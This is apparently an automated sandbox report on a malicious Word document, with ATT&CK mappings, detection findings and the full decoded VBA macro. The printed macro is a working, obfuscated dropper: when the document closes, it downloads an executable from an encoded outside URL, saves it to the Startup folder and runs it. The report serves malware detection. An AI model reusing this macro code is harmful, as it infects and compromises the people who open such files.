Verdict: MALICIOUS (Risk Score: 282)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros. Heuristics indicate the use of WScript.Shell and CreateObject, along with a critical finding of VBA downloading and executing a file via HTTP. The macro code appears to be obfuscated but the intent is to download and run a second-stage payload.
Heuristics (7)
- ClamAV: Doc.Downloader.00536d-6923444-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.00536d-6923444-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched line in script:
  EKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJP = CreateObject("WScript.Shell").Specialfolders(7) + NJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNP
- VBA downloads and writes a file to disk (critical, OLE_VBA_HTTP_DROP_EXEC): VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script:
  JUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTV = XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.responseBody
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script:
  Set KRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIE = CreateObject("Shell.Application")
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4882 bytes |

SHA-256 (macros.bas): facca2159711b1d55ca8411a1ec7d8991b3221bc38c6d6ff7c831e76c0c5375d
Preview script (first 1,000 lines of the extracted script)
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function LJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFO(YIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZM)
VKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSB = 10 - 9
DNDOXKXDBJBMEKMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMML = ""
For OGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHU = VKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSB To Len(YIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZM)
RVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJ = Asc(Mid(YIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZM, OGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHU, VKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSB))
LUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJPDNDOXKXDBJBMEKMLQYGKLPCYNOFI = RVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJ - VKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSB
DNDOXKXDBJBMEKMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMML = DNDOXKXDBJBMEKMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMML & Chr(LUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJPDNDOXKXDBJBMEKMLQYGKLPCYNOFI)
Next
LJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFO = DNDOXKXDBJBMEKMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMML
End Function
Private Sub Document_close()
Set KRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIE = CreateObject("Shell.Application")
Set XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY = CreateObject("microsoft.xmlhttp")
Set KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM = CreateObject("adodb.stream")
NJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNP = LJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFO("]SQKUQ/fyf")
RELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJPDNDOXKXDBJBME = LJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFO("iuuq;00xxx/wbdpnqboz/dp/{b0ijtupsz0vqebuf/fyf")
EKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJP = CreateObject("WScript.Shell").Specialfolders(7) + NJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNP
XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.Open "GET", RELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJPDNDOXKXDBJBME, False
XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.send
JUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTV = XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.responseBody
If XFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIY.Status = 200 Then
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.Open
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.Type = 1
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.Write JUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKMNJVKZRPJTPKRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTV
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.SaveToFile EKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJP, 2
KMLQYGKLPCYNOFIRVQGEEDGYCFNBBJEFBNCRQHCLHCJOGGYYNRXLVLWGMGFCLJUMRUSYHISTXKZPWNQZEYOMMLOGDHVJCKM.Close
End If
KRWONHBOZGMEMFHUONKTRDOZDBHIQBCGLIXFOYIFZPUUTWOLPEKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIE.Open (EKKSTVRELIZQRCQSZFPVPJWHHULUNPCPVSBZLVIEDIQXJDHTQFGWHJNIXDDCFQTWMSSBCEZMTPIYZKYBIGXEQRFJP)
End Sub
Attribute VB_Name = "NewMacros"
Sub BLUR()
'
' BLUR Macro
'
'
End Sub
```